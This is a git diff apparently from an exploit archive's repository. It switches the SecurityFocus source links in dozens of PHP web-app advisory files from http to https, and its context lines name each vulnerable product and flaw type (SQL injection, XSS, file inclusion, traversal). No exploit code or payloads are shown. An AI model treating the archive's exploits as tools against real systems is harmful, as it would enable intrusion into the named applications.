a/exploits/php/webapps/26385.txt b/exploits/php/webapps/26385.txt index 013e56e08..54d146be6 100644 --- a/exploits/php/webapps/26385.txt +++ b/exploits/php/webapps/26385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15176/info +source: https://www.securityfocus.com/bid/15176/info FlatNuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26386.txt b/exploits/php/webapps/26386.txt index 6986245f8..67b0f3944 100644 --- a/exploits/php/webapps/26386.txt +++ b/exploits/php/webapps/26386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15181/info +source: https://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26387.txt b/exploits/php/webapps/26387.txt index 3dd597abc..3045b132f 100644 --- a/exploits/php/webapps/26387.txt +++ b/exploits/php/webapps/26387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15181/info +source: https://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26388.txt b/exploits/php/webapps/26388.txt index 712bbb9d7..4e8dd93d7 100644 --- a/exploits/php/webapps/26388.txt +++ b/exploits/php/webapps/26388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15181/info +source: https://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26389.pl b/exploits/php/webapps/26389.pl index 86433f8b8..ff1d231ac 100755 --- a/exploits/php/webapps/26389.pl +++ b/exploits/php/webapps/26389.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15181/info +source: https://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26390.txt b/exploits/php/webapps/26390.txt index 02f12f011..6b453a29b 100644 --- a/exploits/php/webapps/26390.txt +++ b/exploits/php/webapps/26390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15185/info +source: https://www.securityfocus.com/bid/15185/info saphp Lesson is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26391.html b/exploits/php/webapps/26391.html index 44a4b3d32..815c345f0 100644 --- a/exploits/php/webapps/26391.html +++ b/exploits/php/webapps/26391.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15186/info +source: https://www.securityfocus.com/bid/15186/info Domain Manager Pro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26392.txt b/exploits/php/webapps/26392.txt index 61c3cb176..422168e99 100644 --- a/exploits/php/webapps/26392.txt +++ b/exploits/php/webapps/26392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15196/info +source: https://www.securityfocus.com/bid/15196/info phpMyAdmin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26393.txt b/exploits/php/webapps/26393.txt index 10f8e7ba9..062f40b2e 100644 --- a/exploits/php/webapps/26393.txt +++ b/exploits/php/webapps/26393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15196/info +source: https://www.securityfocus.com/bid/15196/info phpMyAdmin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26394.txt b/exploits/php/webapps/26394.txt index a67ea3ad8..b1cfaf2e5 100644 --- a/exploits/php/webapps/26394.txt +++ b/exploits/php/webapps/26394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15198/info +source: https://www.securityfocus.com/bid/15198/info MWChat is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26395.txt b/exploits/php/webapps/26395.txt index e3f30de69..ba45d0198 100644 --- a/exploits/php/webapps/26395.txt +++ b/exploits/php/webapps/26395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15199/info +source: https://www.securityfocus.com/bid/15199/info Basic Analysis And Security Engine is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26396.pl b/exploits/php/webapps/26396.pl index 37542a81d..647369e5b 100755 --- a/exploits/php/webapps/26396.pl +++ b/exploits/php/webapps/26396.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15204/info +source: https://www.securityfocus.com/bid/15204/info MyBulletinBoard is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26397.txt b/exploits/php/webapps/26397.txt index 2aed5ed28..d9fa42ada 100644 --- a/exploits/php/webapps/26397.txt +++ b/exploits/php/webapps/26397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15205/info +source: https://www.securityfocus.com/bid/15205/info A remote SQL injection vulnerability reportedly affects ipbProArcade. diff --git a/exploits/php/webapps/26399.txt b/exploits/php/webapps/26399.txt index b8868e4a4..cd191a149 100644 --- a/exploits/php/webapps/26399.txt +++ b/exploits/php/webapps/26399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15207/info +source: https://www.securityfocus.com/bid/15207/info vCard is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26400.txt b/exploits/php/webapps/26400.txt index 3a9581db5..6d9b7cc73 100644 --- a/exploits/php/webapps/26400.txt +++ b/exploits/php/webapps/26400.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15209/info +source: https://www.securityfocus.com/bid/15209/info Flyspray is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26423.txt b/exploits/php/webapps/26423.txt index b80e1ba8d..71b0049cd 100644 --- a/exploits/php/webapps/26423.txt +++ b/exploits/php/webapps/26423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15212/info +source: https://www.securityfocus.com/bid/15212/info Mantis is prone to a remote and local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26425.pl b/exploits/php/webapps/26425.pl index 3335f1bb9..157281f50 100755 --- a/exploits/php/webapps/26425.pl +++ b/exploits/php/webapps/26425.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15214/info +source: https://www.securityfocus.com/bid/15214/info Info-DB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26427.txt b/exploits/php/webapps/26427.txt index 1ad82d09b..1c53ba6ce 100644 --- a/exploits/php/webapps/26427.txt +++ b/exploits/php/webapps/26427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15216/info +source: https://www.securityfocus.com/bid/15216/info gCards is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26428.html b/exploits/php/webapps/26428.html index 46e1e24a4..775e3ad22 100644 --- a/exploits/php/webapps/26428.html +++ b/exploits/php/webapps/26428.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15218/info +source: https://www.securityfocus.com/bid/15218/info Search Enhanced module for is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26431.txt b/exploits/php/webapps/26431.txt index bc1658c52..5775cc00e 100644 --- a/exploits/php/webapps/26431.txt +++ b/exploits/php/webapps/26431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15221/info +source: https://www.securityfocus.com/bid/15221/info ATutor is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/26432.txt b/exploits/php/webapps/26432.txt index f910934c6..96c7b3ecc 100644 --- a/exploits/php/webapps/26432.txt +++ b/exploits/php/webapps/26432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15221/info +source: https://www.securityfocus.com/bid/15221/info ATutor is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/26433.txt b/exploits/php/webapps/26433.txt index 001020292..6e0700ca4 100644 --- a/exploits/php/webapps/26433.txt +++ b/exploits/php/webapps/26433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15221/info +source: https://www.securityfocus.com/bid/15221/info ATutor is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/26434.txt b/exploits/php/webapps/26434.txt index d9601701a..77e00d406 100644 --- a/exploits/php/webapps/26434.txt +++ b/exploits/php/webapps/26434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15223/info +source: https://www.securityfocus.com/bid/15223/info PBLang is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26436.txt b/exploits/php/webapps/26436.txt index 1e3b03fdf..2cecd9469 100644 --- a/exploits/php/webapps/26436.txt +++ b/exploits/php/webapps/26436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15235/info +source: https://www.securityfocus.com/bid/15235/info MG2 is affected by an authentication bypass vulnerability. This issue can allow remote attackers to gain access to password protected image galleries. diff --git a/exploits/php/webapps/26437.txt b/exploits/php/webapps/26437.txt index fd6dbaef5..782ca7d8b 100644 --- a/exploits/php/webapps/26437.txt +++ b/exploits/php/webapps/26437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15237/info +source: https://www.securityfocus.com/bid/15237/info PHP Advanced Transfer Manager can allow remote attackers to gain unauthorized access. diff --git a/exploits/php/webapps/26438.txt b/exploits/php/webapps/26438.txt index 19bf584de..5e4d36c74 100644 --- a/exploits/php/webapps/26438.txt +++ b/exploits/php/webapps/26438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15240/info +source: https://www.securityfocus.com/bid/15240/info Invision Gallery is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26440.txt b/exploits/php/webapps/26440.txt index dfb9da879..053eeaa24 100644 --- a/exploits/php/webapps/26440.txt +++ b/exploits/php/webapps/26440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15244/info +source: https://www.securityfocus.com/bid/15244/info PHPcafe Tutorial Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26441.txt b/exploits/php/webapps/26441.txt index 8f2cd6ea6..8aa4f8f43 100644 --- a/exploits/php/webapps/26441.txt +++ b/exploits/php/webapps/26441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15245/info +source: https://www.securityfocus.com/bid/15245/info OaBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26442.txt b/exploits/php/webapps/26442.txt index e06989818..1ae318af5 100644 --- a/exploits/php/webapps/26442.txt +++ b/exploits/php/webapps/26442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15248/info +source: https://www.securityfocus.com/bid/15248/info PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26446.txt b/exploits/php/webapps/26446.txt index 7a2fa1fbc..1d58ec0b4 100644 --- a/exploits/php/webapps/26446.txt +++ b/exploits/php/webapps/26446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15254/info +source: https://www.securityfocus.com/bid/15254/info vCard PRO is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26447.html b/exploits/php/webapps/26447.html index 8ed49e51d..5e6fcd81b 100644 --- a/exploits/php/webapps/26447.html +++ b/exploits/php/webapps/26447.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15257/info +source: https://www.securityfocus.com/bid/15257/info Elite Forum is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26455.txt b/exploits/php/webapps/26455.txt index 835ed7fa9..a9f4de6e3 100644 --- a/exploits/php/webapps/26455.txt +++ b/exploits/php/webapps/26455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15260/info +source: https://www.securityfocus.com/bid/15260/info VUBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26456.txt b/exploits/php/webapps/26456.txt index 770737593..ed001bf53 100644 --- a/exploits/php/webapps/26456.txt +++ b/exploits/php/webapps/26456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15267/info +source: https://www.securityfocus.com/bid/15267/info XMB Nexus Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26458.txt b/exploits/php/webapps/26458.txt index e964b8ed3..f0d553526 100644 --- a/exploits/php/webapps/26458.txt +++ b/exploits/php/webapps/26458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15274/info +source: https://www.securityfocus.com/bid/15274/info News2Net is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26459.txt b/exploits/php/webapps/26459.txt index 85cff39bc..38749008a 100644 --- a/exploits/php/webapps/26459.txt +++ b/exploits/php/webapps/26459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15276/info +source: https://www.securityfocus.com/bid/15276/info phpWebThings is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26465.txt b/exploits/php/webapps/26465.txt index 1c9071497..e7587e7d8 100644 --- a/exploits/php/webapps/26465.txt +++ b/exploits/php/webapps/26465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15295/info +source: https://www.securityfocus.com/bid/15295/info CuteNews is affected by a directory traversal vulnerability. diff --git a/exploits/php/webapps/26466.txt b/exploits/php/webapps/26466.txt index 87929df11..dd889bb3f 100644 --- a/exploits/php/webapps/26466.txt +++ b/exploits/php/webapps/26466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15295/info +source: https://www.securityfocus.com/bid/15295/info CuteNews is affected by a directory traversal vulnerability. diff --git a/exploits/php/webapps/26467.txt b/exploits/php/webapps/26467.txt index 75e617f33..c517bac69 100644 --- a/exploits/php/webapps/26467.txt +++ b/exploits/php/webapps/26467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15301/info +source: https://www.securityfocus.com/bid/15301/info PHP Handicapper is vulnerable to an HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26468.pl b/exploits/php/webapps/26468.pl index aae7c4409..d9a573370 100755 --- a/exploits/php/webapps/26468.pl +++ b/exploits/php/webapps/26468.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15313/info +source: https://www.securityfocus.com/bid/15313/info Galerie is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26469.txt b/exploits/php/webapps/26469.txt index ed3a2db1e..a61a1805f 100644 --- a/exploits/php/webapps/26469.txt +++ b/exploits/php/webapps/26469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15324/info +source: https://www.securityfocus.com/bid/15324/info JPortal is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being used in an SQL query. diff --git a/exploits/php/webapps/26470.txt b/exploits/php/webapps/26470.txt index 9b68dbab0..c4dbfe7a2 100644 --- a/exploits/php/webapps/26470.txt +++ b/exploits/php/webapps/26470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15324/info +source: https://www.securityfocus.com/bid/15324/info JPortal is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being used in an SQL query. diff --git a/exploits/php/webapps/26474.txt b/exploits/php/webapps/26474.txt index 38964914d..d56b1ba99 100644 --- a/exploits/php/webapps/26474.txt +++ b/exploits/php/webapps/26474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15335/info +source: https://www.securityfocus.com/bid/15335/info PHPFM is prone to an arbitrary file upload vulnerability. diff --git a/exploits/php/webapps/26476.txt b/exploits/php/webapps/26476.txt index ae66df2a4..6214fea0d 100644 --- a/exploits/php/webapps/26476.txt +++ b/exploits/php/webapps/26476.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15340/info +source: https://www.securityfocus.com/bid/15340/info OSTE is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26477.txt b/exploits/php/webapps/26477.txt index a18b275ef..0e0e8b78f 100644 --- a/exploits/php/webapps/26477.txt +++ b/exploits/php/webapps/26477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15342/info +source: https://www.securityfocus.com/bid/15342/info XMB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26478.txt b/exploits/php/webapps/26478.txt index 2907fbd56..d38012216 100644 --- a/exploits/php/webapps/26478.txt +++ b/exploits/php/webapps/26478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15344/info +source: https://www.securityfocus.com/bid/15344/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26480.txt b/exploits/php/webapps/26480.txt index d9136b308..f480b8c56 100644 --- a/exploits/php/webapps/26480.txt +++ b/exploits/php/webapps/26480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15348/info +source: https://www.securityfocus.com/bid/15348/info toendaCMS is reported prone to a directory traversal vulnerability. It is demonstrated that this issue may be leveraged to disclose the contents of arbitrary web-server readable files. diff --git a/exploits/php/webapps/26481.txt b/exploits/php/webapps/26481.txt index 2289d649d..8982432f0 100644 --- a/exploits/php/webapps/26481.txt +++ b/exploits/php/webapps/26481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26482.txt b/exploits/php/webapps/26482.txt index 83db65eae..c83468ccb 100644 --- a/exploits/php/webapps/26482.txt +++ b/exploits/php/webapps/26482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26483.txt b/exploits/php/webapps/26483.txt index b5b516f3c..43c549b21 100644 --- a/exploits/php/webapps/26483.txt +++ b/exploits/php/webapps/26483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26484.txt b/exploits/php/webapps/26484.txt index 58a3e00dd..885a0985b 100644 --- a/exploits/php/webapps/26484.txt +++ b/exploits/php/webapps/26484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26485.txt b/exploits/php/webapps/26485.txt index 769448e7d..b3bd0a183 100644 --- a/exploits/php/webapps/26485.txt +++ b/exploits/php/webapps/26485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15350/info +source: https://www.securityfocus.com/bid/15350/info PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input. diff --git a/exploits/php/webapps/26486.txt b/exploits/php/webapps/26486.txt index 2396b8082..d905a9384 100644 --- a/exploits/php/webapps/26486.txt +++ b/exploits/php/webapps/26486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15361/info +source: https://www.securityfocus.com/bid/15361/info SAP Web Application Server is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26487.txt b/exploits/php/webapps/26487.txt index 7207a55a9..828a927f4 100644 --- a/exploits/php/webapps/26487.txt +++ b/exploits/php/webapps/26487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15361/info +source: https://www.securityfocus.com/bid/15361/info SAP Web Application Server is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26488.txt b/exploits/php/webapps/26488.txt index 43dc06de4..e5050ae61 100644 --- a/exploits/php/webapps/26488.txt +++ b/exploits/php/webapps/26488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15362/info +source: https://www.securityfocus.com/bid/15362/info SAP Web Application Server is reported prone to a remote URI redirection vulnerability. diff --git a/exploits/php/webapps/26490.txt b/exploits/php/webapps/26490.txt index e18b3c19f..b7571f909 100644 --- a/exploits/php/webapps/26490.txt +++ b/exploits/php/webapps/26490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15371/info +source: https://www.securityfocus.com/bid/15371/info TikiWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26499.txt b/exploits/php/webapps/26499.txt index ebb9a745c..c14f86be7 100644 --- a/exploits/php/webapps/26499.txt +++ b/exploits/php/webapps/26499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15396/info +source: https://www.securityfocus.com/bid/15396/info phpSysInfo is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26500.txt b/exploits/php/webapps/26500.txt index b1a7797bd..871ec2e22 100644 --- a/exploits/php/webapps/26500.txt +++ b/exploits/php/webapps/26500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15399/info +source: https://www.securityfocus.com/bid/15399/info phpWebThings is prone to an SQL injection vulnerability. This is an input validation issue related to data that will be used in SQL queries, allowing a remote user to influence the structure and logic of a query. diff --git a/exploits/php/webapps/26501.txt b/exploits/php/webapps/26501.txt index 47f6fdab7..fe55621e2 100644 --- a/exploits/php/webapps/26501.txt +++ b/exploits/php/webapps/26501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15400/info +source: https://www.securityfocus.com/bid/15400/info ActiveCampaign 1-2-All Broadcast Email is prone to an SQL-injection vulnerability. This is an input-validation issue related to data that will be used in SQL queries, allowing a remote user to influence the structure and logic of a query. diff --git a/exploits/php/webapps/26502.txt b/exploits/php/webapps/26502.txt index e0959a95f..bd981398e 100644 --- a/exploits/php/webapps/26502.txt +++ b/exploits/php/webapps/26502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15404/info +source: https://www.securityfocus.com/bid/15404/info Help Center Live is prone to a local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26503.txt b/exploits/php/webapps/26503.txt index 84d6ad7f0..b1ee77c00 100644 --- a/exploits/php/webapps/26503.txt +++ b/exploits/php/webapps/26503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15410/info +source: https://www.securityfocus.com/bid/15410/info Wizz Forum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26504.txt b/exploits/php/webapps/26504.txt index 5e9bc678d..3f37456ce 100644 --- a/exploits/php/webapps/26504.txt +++ b/exploits/php/webapps/26504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15410/info +source: https://www.securityfocus.com/bid/15410/info Wizz Forum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26505.txt b/exploits/php/webapps/26505.txt index 672e0ba22..8da90b457 100644 --- a/exploits/php/webapps/26505.txt +++ b/exploits/php/webapps/26505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15417/info +source: https://www.securityfocus.com/bid/15417/info Unspecified Codegrrl applications are prone to a remote arbitrary code execution vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26510.txt b/exploits/php/webapps/26510.txt index 16fa75de8..b2742f984 100644 --- a/exploits/php/webapps/26510.txt +++ b/exploits/php/webapps/26510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15425/info +source: https://www.securityfocus.com/bid/15425/info Pearl Forums is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26511.txt b/exploits/php/webapps/26511.txt index 3bc930174..757b2c953 100644 --- a/exploits/php/webapps/26511.txt +++ b/exploits/php/webapps/26511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15433/info +source: https://www.securityfocus.com/bid/15433/info Pearl Forums is prone to a local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26512.txt b/exploits/php/webapps/26512.txt index 9ff08d390..7c8f3e7e0 100644 --- a/exploits/php/webapps/26512.txt +++ b/exploits/php/webapps/26512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15436/info +source: https://www.securityfocus.com/bid/15436/info phpWCMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26513.txt b/exploits/php/webapps/26513.txt index e49fba458..9bf25bfa2 100644 --- a/exploits/php/webapps/26513.txt +++ b/exploits/php/webapps/26513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15436/info +source: https://www.securityfocus.com/bid/15436/info phpWCMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26514.txt b/exploits/php/webapps/26514.txt index 0b99c7b02..95192f403 100644 --- a/exploits/php/webapps/26514.txt +++ b/exploits/php/webapps/26514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15440/info +source: https://www.securityfocus.com/bid/15440/info phpwcms is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26515.txt b/exploits/php/webapps/26515.txt index d774c97cc..ba1890f51 100644 --- a/exploits/php/webapps/26515.txt +++ b/exploits/php/webapps/26515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15441/info +source: https://www.securityfocus.com/bid/15441/info Template Seller Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26516.txt b/exploits/php/webapps/26516.txt index 92ddeb09c..d8108b5e7 100644 --- a/exploits/php/webapps/26516.txt +++ b/exploits/php/webapps/26516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15447/info +source: https://www.securityfocus.com/bid/15447/info Ekinboard is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26530.txt b/exploits/php/webapps/26530.txt index cea3aadd1..272013389 100644 --- a/exploits/php/webapps/26530.txt +++ b/exploits/php/webapps/26530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60823/info +source: https://www.securityfocus.com/bid/60823/info GLPI is prone to a remote PHP code-execution vulnerability. diff --git a/exploits/php/webapps/26535.txt b/exploits/php/webapps/26535.txt index 79135f8d6..5538e5fce 100644 --- a/exploits/php/webapps/26535.txt +++ b/exploits/php/webapps/26535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15485/info +source: https://www.securityfocus.com/bid/15485/info LiteSpeed Web Server is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26538.txt b/exploits/php/webapps/26538.txt index c42a77cd2..ce0c3a360 100644 --- a/exploits/php/webapps/26538.txt +++ b/exploits/php/webapps/26538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15502/info +source: https://www.securityfocus.com/bid/15502/info PHP-Fusion is prone to SQL injection vulnerabilities in multiple PHP scripts. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26539.txt b/exploits/php/webapps/26539.txt index 473c81034..6c738bfe6 100644 --- a/exploits/php/webapps/26539.txt +++ b/exploits/php/webapps/26539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15506/info +source: https://www.securityfocus.com/bid/15506/info Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git 